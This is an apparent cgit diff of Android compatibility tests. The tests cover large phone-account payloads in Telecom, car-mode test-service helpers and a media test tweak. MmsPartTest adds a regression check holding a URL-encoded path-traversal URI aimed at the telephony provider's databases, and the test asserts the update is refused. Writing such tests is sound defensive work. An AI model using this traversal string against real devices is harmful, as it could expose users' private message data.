+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.telecom.cts;
+
+import static android.telecom.PhoneAccount.CAPABILITY_CALL_PROVIDER;
+import static android.telecom.PhoneAccount.CAPABILITY_SELF_MANAGED;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.ServiceConnection;
+import android.net.Uri;
+import android.os.IBinder;
+import android.os.RemoteException;
+import android.telecom.PhoneAccount;
+import android.telecom.PhoneAccountHandle;
+import android.telecom.TelecomManager;
+import android.telecom.cts.carmodetestapp.ICtsCarModeInCallServiceControl;
+import android.telecom.cts.carmodetestappselfmanaged.CtsCarModeInCallServiceControlSelfManaged;
+import android.util.Log;
+
+import com.android.compatibility.common.util.ShellIdentityUtils;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+
+public class PhoneAccountRegistrarTest extends BaseTelecomTestWithMockServices {
+
+ private static final String TAG = "PhoneAccountRegistrarTest";
+ private static final long TIMEOUT = 3000L;
+ private static final int LARGE_ACCT_HANDLE_ID_MIN_SIZE = 50000;
+ private static final String RANDOM_CHAR_VALUE = "a";
+ private static final String TEL_PREFIX = "tel:";
+ private static final String TELECOM_CLEANUP_ACCTS_CMD = "telecom cleanup-orphan-phone-accounts";
+
+ public static final int MAX_PHONE_ACCOUNT_REGISTRATIONS = 10; // mirrors constant in...
+ // PhoneAccountRegistrar called MAX_PHONE_ACCOUNT_REGISTRATIONS
+
+ // permissions
+ private static final String READ_PHONE_STATE_PERMISSION =
+ "android.permission.READ_PRIVILEGED_PHONE_STATE";
+ private static final String MODIFY_PHONE_STATE_PERMISSION =
+ "android.permission.MODIFY_PHONE_STATE";
+ private static final String REGISTER_SIM_SUBSCRIPTION_PERMISSION =
+ "android.permission.REGISTER_SIM_SUBSCRIPTION";
+ // telecom cts test package (default package that registers phoneAccounts)
+ private static final ComponentName TEST_COMPONENT_NAME =
+ new ComponentName(TestUtils.PACKAGE, TestUtils.COMPONENT);
+ // secondary test package (extra package that can be set up to register phoneAccounts)
+ private static final String SELF_MANAGED_CAR_PACKAGE =
+ CtsCarModeInCallServiceControlSelfManaged.class.getPackage().getName();
+ private static final ComponentName SELF_MANAGED_CAR_RELATIVE_COMPONENT = ComponentName
+ .createRelative(SELF_MANAGED_CAR_PACKAGE,
+ CtsCarModeInCallServiceControlSelfManaged.class.getName());
+ private static final ComponentName CAR_COMPONENT = new ComponentName(SELF_MANAGED_CAR_PACKAGE,
+ TestUtils.SELF_MANAGED_COMPONENT);
+ private static final String CAR_MODE_CONTROL =
+ "android.telecom.cts.carmodetestapp.ACTION_CAR_MODE_CONTROL";
+ // variables to interface with the second test package
+ TestServiceConnection mControl;
+ ICtsCarModeInCallServiceControl mSecondaryTestPackageControl;
+
+ @Override
+ public void setUp() throws Exception {
+ // Sets up this package as default dialer in super.
+ super.setUp();
+ NewOutgoingCallBroadcastReceiver.reset();
+ if (!mShouldTestTelecom) return;
+ setupConnectionService(null, 0);
+ // cleanup any accounts registered to the test package before starting tests
+ cleanupPhoneAccounts();
+ }
+
+ @Override
+ public void tearDown() throws Exception {
+ // cleanup any accounts registered to the test package after testing to avoid crashing other
+ // tests.
+ cleanupPhoneAccounts();
+ super.tearDown();
+ }
+
+ /**
+ * Test the scenario where {@link android.telecom.TelecomManager
+ * #getCallCapablePhoneAccounts(boolean)} is called with a heavy payload
+ * that could cause a {@link android.os.TransactionTooLargeException}. Telecom is expected to
+ * handle this by splitting the parcels via {@link android.content.pm.ParceledListSlice}.
+ */
+ public void testGettingLargeCallCapablePhoneAccountHandlePayload() throws Exception {
+ if (!mShouldTestTelecom) return;
+ // ensure the test starts without any phone accounts registered to the test package
+ cleanupPhoneAccounts();
+ // generate a large phoneAccountHandle id string to create a large payload
+ String largeAccountHandleId = generateLargeString(
+ LARGE_ACCT_HANDLE_ID_MIN_SIZE, RANDOM_CHAR_VALUE);
+ assertEquals(LARGE_ACCT_HANDLE_ID_MIN_SIZE, largeAccountHandleId.length());
+ // create handles for package 1
+ List<PhoneAccount> phoneAccountsForPackage1 =
+ generatePhoneAccountsForPackage(TEST_COMPONENT_NAME, largeAccountHandleId,
+ numberOfPhoneAccountsCtsPackageCanRegister(), CAPABILITY_CALL_PROVIDER);
+ //create handles for package 2
+ List<PhoneAccount> phoneAccountsForPackage2 =
+ generatePhoneAccountsForPackage(CAR_COMPONENT, largeAccountHandleId,
+ MAX_PHONE_ACCOUNT_REGISTRATIONS, CAPABILITY_CALL_PROVIDER);
+ try {
+ // register all accounts for package 1
+ phoneAccountsForPackage1.stream()
+ .forEach(a -> mTelecomManager.registerPhoneAccount(a));
+ // verify all can be fetched
+ verifyCanFetchCallCapableAccounts();
+ // register all accounts for package 2
+ bindToSecondTestPackageAndRegisterAccounts(phoneAccountsForPackage2);
+ // verify all can be fetched
+ verifyCanFetchCallCapableAccounts();
+ } catch (IllegalArgumentException e) {
+ // allow test pass ...
+ Log.i(TAG, "testGettingLargeCallCapablePhoneAccountHandlePayload:"
+ + " illegal arg exception thrown.");
+ } finally {
+ unbindSecondTestPackageAndUnregisterAccounts(phoneAccountsForPackage2);
+ cleanupPhoneAccounts();
+ }
+ }
+
+ /**
+ * Test the scenario where {@link android.telecom.TelecomManager#getSelfManagedPhoneAccounts()}
+ * is called with a heavy payload that could cause a {@link
+ * android.os.TransactionTooLargeException}. Telecom is expected to handle this by splitting
+ * the parcels via {@link android.content.pm.ParceledListSlice}.
+ */
+ public void testGettingLargeSelfManagedPhoneAccountHandlePayload() throws Exception {
+ if (!mShouldTestTelecom) return;
+ // ensure the test starts without any phone accounts registered to the test package
+ cleanupPhoneAccounts();
+ // generate a large phoneAccountHandle id string to create a large payload
+ String largeAccountHandleId = generateLargeString(
+ LARGE_ACCT_HANDLE_ID_MIN_SIZE, RANDOM_CHAR_VALUE);
+ assertEquals(LARGE_ACCT_HANDLE_ID_MIN_SIZE, largeAccountHandleId.length());
+ // create handles for package 1
+ List<PhoneAccount> phoneAccountsForPackage1 =
+ generatePhoneAccountsForPackage(TEST_COMPONENT_NAME, largeAccountHandleId,
+ numberOfPhoneAccountsCtsPackageCanRegister(), CAPABILITY_SELF_MANAGED);
+ //create handles for package 2
+ List<PhoneAccount> phoneAccountsForPackage2 =
+ generatePhoneAccountsForPackage(CAR_COMPONENT, largeAccountHandleId,
+ MAX_PHONE_ACCOUNT_REGISTRATIONS, CAPABILITY_SELF_MANAGED);
+ try {
+ // register all accounts for package 1
+ phoneAccountsForPackage1.stream()
+ .forEach(a -> mTelecomManager.registerPhoneAccount(a));
+ // verify all can be fetched
+ verifyCanFetchSelfManagedPhoneAccounts();
+ // register all accounts for package 2
+ bindToSecondTestPackageAndRegisterAccounts(phoneAccountsForPackage2);
+ // verify all can be fetched
+ verifyCanFetchSelfManagedPhoneAccounts();
+ } catch (IllegalArgumentException e) {
+ // allow test pass ...
+ Log.i(TAG, "testGettingLargeSelfManagedPhoneAccountHandlePayload:"
+ + " illegal arg exception thrown.");
+ } finally {
+ unbindSecondTestPackageAndUnregisterAccounts(phoneAccountsForPackage2);
+ cleanupPhoneAccounts();
+ }
+ }
+
+ /**
+ * Test the scenario where {@link android.telecom.TelecomManager#getAllPhoneAccountHandles()}
+ * is called with a heavy payload that could cause a {@link
+ * android.os.TransactionTooLargeException}. Telecom is expected to handle this by splitting
+ * the parcels via {@link android.content.pm.ParceledListSlice}.
+ */
+ public void testGettingAllPhoneAccountHandlesWithLargePayload() throws Exception {
+ if (!mShouldTestTelecom) return;
+ // ensure the test starts without any phone accounts registered to the test package
+ cleanupPhoneAccounts();
+ // generate a large phoneAccountHandle id string to create a large payload
+ String largeAccountHandleId = generateLargeString(
+ LARGE_ACCT_HANDLE_ID_MIN_SIZE, RANDOM_CHAR_VALUE);
+ assertEquals(LARGE_ACCT_HANDLE_ID_MIN_SIZE, largeAccountHandleId.length());
+ // create handles for package 1
+ List<PhoneAccount> phoneAccountsForPackage1 =
+ generatePhoneAccountsForPackage(TEST_COMPONENT_NAME, largeAccountHandleId,
+ numberOfPhoneAccountsCtsPackageCanRegister(), CAPABILITY_SELF_MANAGED);
+ //create handles for package 2
+ List<PhoneAccount> phoneAccountsForPackage2 =
+ generatePhoneAccountsForPackage(CAR_COMPONENT, largeAccountHandleId,
+ MAX_PHONE_ACCOUNT_REGISTRATIONS, CAPABILITY_SELF_MANAGED);
+ try {
+ // register all accounts for package 1
+ phoneAccountsForPackage1.stream()
+ .forEach(a -> mTelecomManager.registerPhoneAccount(a));
+ // verify all can be fetched
+ verifyCanFetchAllPhoneAccountHandles();
+ // register all accounts for package 2
+ bindToSecondTestPackageAndRegisterAccounts(phoneAccountsForPackage2);
+ // verify all can be fetched
+ verifyCanFetchAllPhoneAccountHandles();
+ } catch (IllegalArgumentException e) {
+ // allow test pass ...
+ } finally {
+ unbindSecondTestPackageAndUnregisterAccounts(phoneAccountsForPackage2);
+ cleanupPhoneAccounts();
+ }
+ }
+
+ /**
+ * Test the scenario where {@link TelecomManager#getAllPhoneAccounts()}
+ * is called with a heavy payload that could cause a {@link
+ * android.os.TransactionTooLargeException}. Telecom is expected to handle this by splitting
+ * the parcels via {@link android.content.pm.ParceledListSlice}.
+ */
+ public void testGetAllPhoneAccountsWithLargePayload() throws Exception {
+ if (!mShouldTestTelecom) return;
+ // ensure the test starts without any phone accounts registered to the test package
+ cleanupPhoneAccounts();
+ // generate a large phoneAccountHandle id string to create a large payload
+ String largeAccountHandleId = generateLargeString(
+ LARGE_ACCT_HANDLE_ID_MIN_SIZE, RANDOM_CHAR_VALUE);
+ assertEquals(LARGE_ACCT_HANDLE_ID_MIN_SIZE, largeAccountHandleId.length());
+ // create handles for package 1
+ List<PhoneAccount> phoneAccountsForPackage1 =
+ generatePhoneAccountsForPackage(TEST_COMPONENT_NAME, largeAccountHandleId,
+ numberOfPhoneAccountsCtsPackageCanRegister(),
+ CAPABILITY_CALL_PROVIDER
+ | PhoneAccount.CAPABILITY_SIM_SUBSCRIPTION);
+ //create handles for package 2
+ List<PhoneAccount> phoneAccountsForPackage2 =
+ generatePhoneAccountsForPackage(CAR_COMPONENT, largeAccountHandleId,
+ MAX_PHONE_ACCOUNT_REGISTRATIONS,
+ CAPABILITY_SELF_MANAGED);
+ try {
+ // register all accounts for package 1
+ for (PhoneAccount pa : phoneAccountsForPackage1) {
+ ShellIdentityUtils.invokeMethodWithShellPermissionsNoReturn(mTelecomManager,
+ tm -> tm.registerPhoneAccount(pa), REGISTER_SIM_SUBSCRIPTION_PERMISSION);
+ }
+ // verify all can be fetched
+ verifyCanFetchAllPhoneAccounts();
+ // register all accounts for package 2
+ bindToSecondTestPackageAndRegisterAccounts(phoneAccountsForPackage2);
+ // verify all can be fetched
+ verifyCanFetchAllPhoneAccounts();
+ } catch (IllegalArgumentException e) {
+ // allow test pass ...
+ } finally {
+ unbindSecondTestPackageAndUnregisterAccounts(phoneAccountsForPackage2);
+ cleanupPhoneAccounts();
+ }
+ }
+
+ // -- The following are helper methods for this testing class. --
+ private String generateLargeString(int size, String repeatStrValue) {
+ StringBuilder sb = new StringBuilder();
+ for (int i = 0; i < size; i++) {
+ sb.append(repeatStrValue);
+ }
+ return sb.toString();
+ }
+
+ private List<PhoneAccount> generatePhoneAccountsForPackage(ComponentName cn, String baseId,
+ int numOfAccountsToRegister, int capabilities) {
+ List<PhoneAccount> accounts = new ArrayList<>();
+ for (int i = 0; i < numOfAccountsToRegister; i++) {
+ String id = baseId + i;
+ PhoneAccountHandle pah = new PhoneAccountHandle(cn, id);
+ // create phoneAccount
+ String number = TEL_PREFIX + i;
+ PhoneAccount pa = PhoneAccount.builder(pah, TestUtils.ACCOUNT_LABEL)
+ .setAddress(Uri.parse(number))
+ .setSubscriptionAddress(Uri.parse(number))
+ .addSupportedUriScheme(PhoneAccount.SCHEME_TEL)
+ .setCapabilities(capabilities)
+ .build();
+ accounts.add(pa);
+ }
+ return accounts;
+ }
+
+ public void bindToSecondTestPackageAndRegisterAccounts(List<PhoneAccount> accounts)
+ throws Exception {
+ bindToSecondTestPackage();
+ registerAccountsToSecondTestPackage(accounts);
+ }
+
+ public void unbindSecondTestPackageAndUnregisterAccounts(List<PhoneAccount> accounts) {
+ try {
+ mContext.unbindService(mControl);
+ unRegisterAccountsForSecondTestPackage(accounts);
+ } catch (Exception e) {
+ Log.d(TAG,
+ "exception thrown while trying to unbind and unregister accts for 2nd package");
+ }
+ }
+
+ public void bindToSecondTestPackage() throws RemoteException {
+ // Set up binding for second package. This is needed in order to bypass a SecurityException
+ // thrown by a second test package registering phone accounts.
+ mControl = setUpControl(CAR_MODE_CONTROL, SELF_MANAGED_CAR_RELATIVE_COMPONENT);
+ mSecondaryTestPackageControl =
+ ICtsCarModeInCallServiceControl.Stub.asInterface(mControl.getService());
+ // reset all package variables etc.
+ if (mSecondaryTestPackageControl != null) {
+ mSecondaryTestPackageControl.reset(); //... done setting up binding
+ }
+ }
+
+ public void registerAccountsToSecondTestPackage(List<PhoneAccount> accounts)
+ throws Exception {
+ if (mSecondaryTestPackageControl != null) {
+ for (PhoneAccount p : accounts) {
+ mSecondaryTestPackageControl.registerPhoneAccount(p);
+ TestUtils.enablePhoneAccount(getInstrumentation(), p.getAccountHandle());
+ }
+ }
+ }
+
+ public void unRegisterAccountsForSecondTestPackage(List<PhoneAccount> accounts)
+ throws RemoteException {
+ if (mSecondaryTestPackageControl != null) {
+ for (PhoneAccount p : accounts) {
+ mSecondaryTestPackageControl.unregisterPhoneAccount(p.getAccountHandle());
+ }
+ }
+ }
+
+ public void verifyCanFetchCallCapableAccounts() {
+ List<PhoneAccountHandle> res =
+ mTelecomManager.getCallCapablePhoneAccounts(true);
+ assertNotNull(res);
+ assertTrue(res.size() > 0);
+ }
+
+ public void verifyCanFetchAllPhoneAccountHandles() {
+ List<PhoneAccountHandle> res =
+ ShellIdentityUtils.invokeMethodWithShellPermissions(
+ mTelecomManager, (tm) -> tm.getAllPhoneAccountHandles(),
+ MODIFY_PHONE_STATE_PERMISSION);
+ assertNotNull(res);
+ assertTrue(res.size() > 0);
+ }
+
+ public void verifyCanFetchAllPhoneAccounts() {
+ List<PhoneAccount> res =
+ ShellIdentityUtils.invokeMethodWithShellPermissions(
+ mTelecomManager, (tm) -> tm.getAllPhoneAccounts(),
+ MODIFY_PHONE_STATE_PERMISSION);
+ assertNotNull(res);
+ assertTrue(res.size() > 0);
+ }
+
+ public void verifyCanFetchSelfManagedPhoneAccounts() {
+ List<PhoneAccountHandle> res =
+ mTelecomManager.getSelfManagedPhoneAccounts();
+ assertNotNull(res);
+ assertTrue(res.size() > 0);
+ }
+
+ private int numberOfPhoneAccountsCtsPackageCanRegister() {
+ return MAX_PHONE_ACCOUNT_REGISTRATIONS - getNumberOfPhoneAccountsRegisteredToTestPackage();
+ }
+
+ private TestServiceConnection setUpControl(String action, ComponentName componentName) {
+ Intent bindIntent = new Intent(action);
+ bindIntent.setComponent(componentName);
+ TestServiceConnection
+ serviceConnection = new TestServiceConnection();
+ mContext.bindService(bindIntent, serviceConnection, Context.BIND_AUTO_CREATE);
+ if (!serviceConnection.waitBind()) {
+ fail("fail bind to service");
+ }
+ return serviceConnection;
+ }
+
+ private class TestServiceConnection implements ServiceConnection {
+ private IBinder mService;
+ private CountDownLatch mLatch = new CountDownLatch(1);
+ private boolean mIsConnected;
+
+ @Override
+ public void onServiceConnected(ComponentName componentName, IBinder service) {
+ Log.i(TAG, "Service Connected: " + componentName);
+ mService = service;
+ mIsConnected = true;
+ mLatch.countDown();
+ }
+
+ @Override
+ public void onServiceDisconnected(ComponentName componentName) {
+ mService = null;
+ }
+
+ public IBinder getService() {
+ return mService;
+ }
+
+ public boolean waitBind() {
+ try {
+ mLatch.await(TIMEOUT, TimeUnit.MILLISECONDS);
+ return mIsConnected;
+ } catch (InterruptedException e) {
+ return false;
+ }
+ }
+ }
+
+ /**
+ * Helper that cleans up any phone accounts registered to this testing package. Requires
+ * the permission READ_PRIVILEGED_PHONE_STATE in order to invoke the
+ * getPhoneAccountsForPackage() method.
+ */
+ private void cleanupPhoneAccounts() {
+ try {
+ if (mTelecomManager != null) {
+ // Get all handles registered to the testing package
+ List<PhoneAccountHandle> handles =
+ ShellIdentityUtils.invokeMethodWithShellPermissions(
+ mTelecomManager, (tm) -> tm.getPhoneAccountsForPackage(),
+ READ_PHONE_STATE_PERMISSION);
+ // cleanup any extra phone accounts registered to the testing package
+ if (handles.size() > 0 && mTelecomManager != null) {
+ handles.stream().forEach(
+ d -> mTelecomManager.unregisterPhoneAccount(d));
+ }
+ TestUtils.executeShellCommand(getInstrumentation(), TELECOM_CLEANUP_ACCTS_CMD);
+ }
+ } catch (Exception e) {
+ Log.d(TAG, "cleanupPhoneAccounts: hit exception while trying to clean");
+ }
+ }
+
+ /**
+ * Helper that gets the number of phone accounts registered to the testing package. Requires
+ * the permission READ_PRIVILEGED_PHONE_STATE in order to invoke the
+ * getPhoneAccountsForPackage() method.
+ *
+ * @return number of phone accounts registered to the testing package.
+ */
+ private int getNumberOfPhoneAccountsRegisteredToTestPackage() {
+ if (mTelecomManager != null) {
+ return ShellIdentityUtils.invokeMethodWithShellPermissions(
+ mTelecomManager, (tm) -> tm.getPhoneAccountsForPackage(),
+ READ_PHONE_STATE_PERMISSION).size();
+ }
+ return 0;
+ }
+} \ No newline at end of file
diff --git a/tests/tests/telecom/src/android/telecom/cts/carmodetestapp/CtsCarModeInCallServiceControl.java b/tests/tests/telecom/src/android/telecom/cts/carmodetestapp/CtsCarModeInCallServiceControl.java
index fe38d3c6b5b..f53cfc31a87 100644
--- a/tests/tests/telecom/src/android/telecom/cts/carmodetestapp/CtsCarModeInCallServiceControl.java
+++ b/tests/tests/telecom/src/android/telecom/cts/carmodetestapp/CtsCarModeInCallServiceControl.java
@@ -21,6 +21,9 @@ import android.app.UiModeManager;
import android.content.ComponentName;
import android.content.Intent;
import android.os.IBinder;
+import android.telecom.PhoneAccount;
+import android.telecom.PhoneAccountHandle;
+import android.telecom.TelecomManager;
import android.util.Log;
/**
@@ -97,6 +100,22 @@ public class CtsCarModeInCallServiceControl extends Service {
public boolean checkBindStatus(boolean bind) {
return CtsCarModeInCallService.checkBindStatus(bind);
}
+
+ @Override
+ public void registerPhoneAccount(PhoneAccount phoneAccount) {
+ TelecomManager telecomManager = getSystemService(TelecomManager.class);
+ if (telecomManager != null) {
+ telecomManager.registerPhoneAccount(phoneAccount);
+ }
+ }
+
+ @Override
+ public void unregisterPhoneAccount(PhoneAccountHandle phoneAccountHandle) {
+ TelecomManager telecomManager = getSystemService(TelecomManager.class);
+ if (telecomManager != null) {
+ telecomManager.unregisterPhoneAccount(phoneAccountHandle);
+ }
+ }
};
@Override
diff --git a/tests/tests/telephonyprovider/src/android/telephonyprovider/cts/MmsPartTest.java b/tests/tests/telephonyprovider/src/android/telephonyprovider/cts/MmsPartTest.java
index 00e4dfe157a..5ab32fc0b14 100644
--- a/tests/tests/telephonyprovider/src/android/telephonyprovider/cts/MmsPartTest.java
+++ b/tests/tests/telephonyprovider/src/android/telephonyprovider/cts/MmsPartTest.java
@@ -127,6 +127,19 @@ public class MmsPartTest {
}
+ /**
+ * Verifies uri path outside the directory of mms parts is not allowed.
+ */
+ @Test
+ public void testMmsPartUpdate_invalidUri() {
+ ContentValues cv = new ContentValues();
+ Uri uri = Uri.parse("content://mms/resetFilePerm/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.."
+ + "%2F..%2F..%2F..%2F..%2Fdata%2Fuser_de%2F0%2Fcom.android.providers.telephony"
+ + "%2Fdatabases");
+ int cursorUpdate = mContentResolver.update(uri, cv, null, null);
+ assertThat(cursorUpdate).isEqualTo(0);
+ }
+
@Test
public void testMmsPartDelete_canDeleteById() {
Uri mmsUri = insertIntoMmsTable(MMS_SUBJECT_ONE);
diff --git a/tools/cts-media-preparer-app/src/android/mediastress/cts/preconditions/app/MediaPreparerAppTest.java b/tools/cts-media-preparer-app/src/android/mediastress/cts/preconditions/app/MediaPreparerAppTest.java
index 0f4fd691170..7f80e5601e8 100644
--- a/tools/cts-media-preparer-app/src/android/mediastress/cts/preconditions/app/MediaPreparerAppTest.java
+++ b/tools/cts-media-preparer-app/src/android/mediastress/cts/preconditions/app/MediaPreparerAppTest.java
@@ -82,8 +82,12 @@ public class MediaPreparerAppTest {
@Test
public void testGetResolutions() throws Exception {
+ String moduleName = InstrumentationRegistry.getArguments().getString("module-name");
+ if (moduleName == null) {
+ moduleName = MODULE_NAME;
+ }
Resolution maxRes = new Resolution(DEFAULT_MAX_WIDTH, DEFAULT_MAX_HEIGHT);
- DynamicConfigDeviceSide config = new DynamicConfigDeviceSide(MODULE_NAME);
+ DynamicConfigDeviceSide config = new DynamicConfigDeviceSide(moduleName);
for (String key : config.keySet()) {
int width = 0;
int height = 0;
generated by cgit v1.2.3 (git 2.25.1) at 2024-06-09 03:40:05 +0000